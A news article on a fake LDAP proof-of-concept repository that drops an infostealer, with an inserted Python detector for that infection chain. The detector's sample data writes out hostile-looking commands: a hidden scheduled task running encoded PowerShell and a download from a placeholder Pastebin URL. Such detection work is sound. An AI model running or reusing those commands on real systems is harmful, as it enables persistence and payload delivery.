SecurityWeek
Infostealer Masquerades as PoC Code Targeting Recent LDAP Vulnerability

A fake proof-of-concept (PoC) exploit for a recent LDAP vulnerability distributes information stealer malware.

Threat actors are distributing information stealer malware masquerading as proof-of-concept (PoC) exploit code targeting a recent Windows Lightweight Directory Access Protocol (LDAP) vulnerability.

Tracked as CVE-2024-49113 (CVSS score of 7.5) and leading to denial-of-service (DoS), the security defect was addressed on December 10 along with over 70 flaws, including a critical LDAP bug (CVE-2024-49112) that could lead to remote code execution (RCE).

Less than a month after patches were rolled out for the two issues, SafeBreach published PoC code targeting CVE-2024-49113, saying that it should be considered as important as the RCE flaw.

According to SafeBreach, which refers to CVE-2024-49113 as LDAPNightmare, the vulnerability can be abused to crash any unpatched Windows server, even those that are not Domain Controllers, if there is an internet-accessible DNS server.

Now, Trend Micro warns of a fake PoC exploit that lures security researchers into executing information stealer malware on their systems.

“Although the tactic of using PoC lures as a vehicle for malware delivery is not new, this attack still poses significant concerns, especially since it capitalizes on a trending issue that could potentially affect a larger number of victims,” Trend Micro notes.

The fake PoC is distributed via a repository forked from the original; in the fork, the original Python files are replaced with an executable packed using UPX.

When executed, the fake PoC drops a PowerShell script in the system’s temporary folder. The script creates a scheduled task that executes an encoded script designed to download another script from Pastebin.


The second script collects system information such as the process list, directory listings, IP addresses, network adapter details, and installed updates, compresses it into a ZIP archive, and uploads it to an external FTP server.
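The infection chain described above (an executable dropping a PowerShell script into the temp folder, a scheduled task running an encoded command, a second stage fetched from Pastebin, and a ZIP exfiltrated over FTP) maps onto a handful of host-telemetry checks. The following is an added example of such detection logic; it is not code from Trend Micro, SafeBreach or the campaign, and it assumes a simplified event format (dicts with `type`, `image`, `cmdline`, `dport`) standing in for process-creation and network events. The sample events, the `Updater` task name, the `203.0.113.10` address and the Pastebin URL are all constructed placeholders.

```python
import base64
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# followed by base64 of a UTF-16LE string. Require a reasonably long base64 blob so
# that flags such as -ExecutionPolicy are not mistaken for it.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
TEMP_PATH = re.compile(r"(?i)(\\AppData\\Local\\Temp\\|%TEMP%|\\Windows\\Temp\\)")
PASTE_HOST = re.compile(r"(?i)pastebin\.com")

# Constructed second-stage command (placeholder URL, not a real paste).
STAGE2_COMMAND = 'Invoke-WebRequest -Uri https://pastebin.com/raw/EXAMPLE -OutFile $env:TEMP\\stage2.ps1'
ENCODED_STAGE2 = base64.b64encode(STAGE2_COMMAND.encode("utf-16le")).decode("ascii")

PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample telemetry: one benign process, the three suspicious steps of the
# chain, and a benign schtasks query that must not be flagged.
SAMPLE_EVENTS = [
    {"type": "process", "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe readme.txt"},
    {"type": "process", "image": PS_IMAGE,
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\user\\AppData\\Local\\Temp\\poc.ps1"},
    {"type": "process", "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": f'schtasks.exe /create /tn "Updater" /sc minute /mo 5 /tr "powershell -w hidden -enc {ENCODED_STAGE2}"'},
    {"type": "network", "image": PS_IMAGE, "dst": "203.0.113.10", "dport": 21},
    {"type": "process", "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks.exe /query /tn Updater"},
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> list[str]:
    """Return human-readable findings for a single event (empty list if benign)."""
    findings = []
    if event.get("type") == "process":
        image = event.get("image", "").lower()
        cmd = event.get("cmdline", "")
        # Step 2 of the chain: persistence via a scheduled task whose action is encoded PowerShell.
        if image.endswith("schtasks.exe") and "/create" in cmd.lower() and ENC_FLAG.search(cmd):
            findings.append("scheduled task created with encoded PowerShell action")
        # Step 1: the dropped script is executed from the temp folder.
        if image.endswith("powershell.exe") and TEMP_PATH.search(cmd):
            findings.append("PowerShell script launched from a temp folder")
        # Step 3: decode the payload and look for the Pastebin download.
        decoded = decode_encoded_command(cmd)
        if decoded and PASTE_HOST.search(decoded):
            findings.append("encoded command fetches content from pastebin.com")
    elif event.get("type") == "network":
        # Step 4: the collector ships the ZIP over FTP; PowerShell talking FTP is unusual.
        if event.get("dport") == 21 and event.get("image", "").lower().endswith("powershell.exe"):
            findings.append("PowerShell process opening outbound FTP connection")
    return findings


def scan(events: list) -> dict:
    """Map event index -> findings for every event that produced at least one finding."""
    results = {}
    for index, event in enumerate(events):
        findings = analyze_event(event)
        if findings:
            results[index] = findings
    return results


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS).items():
        print(f"event {index}: " + "; ".join(findings))
```

Each check is deliberately narrow and keyed to one step of the chain, so a single hit is a lead rather than a verdict; the scheduled task with an encoded action whose decoded body reaches Pastebin is the combination worth paging on, and decoding the payload (rather than matching the base64 blob) is what makes the indicator survive trivial re-encoding.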


Ionut Arghire is an international correspondent for SecurityWeek.
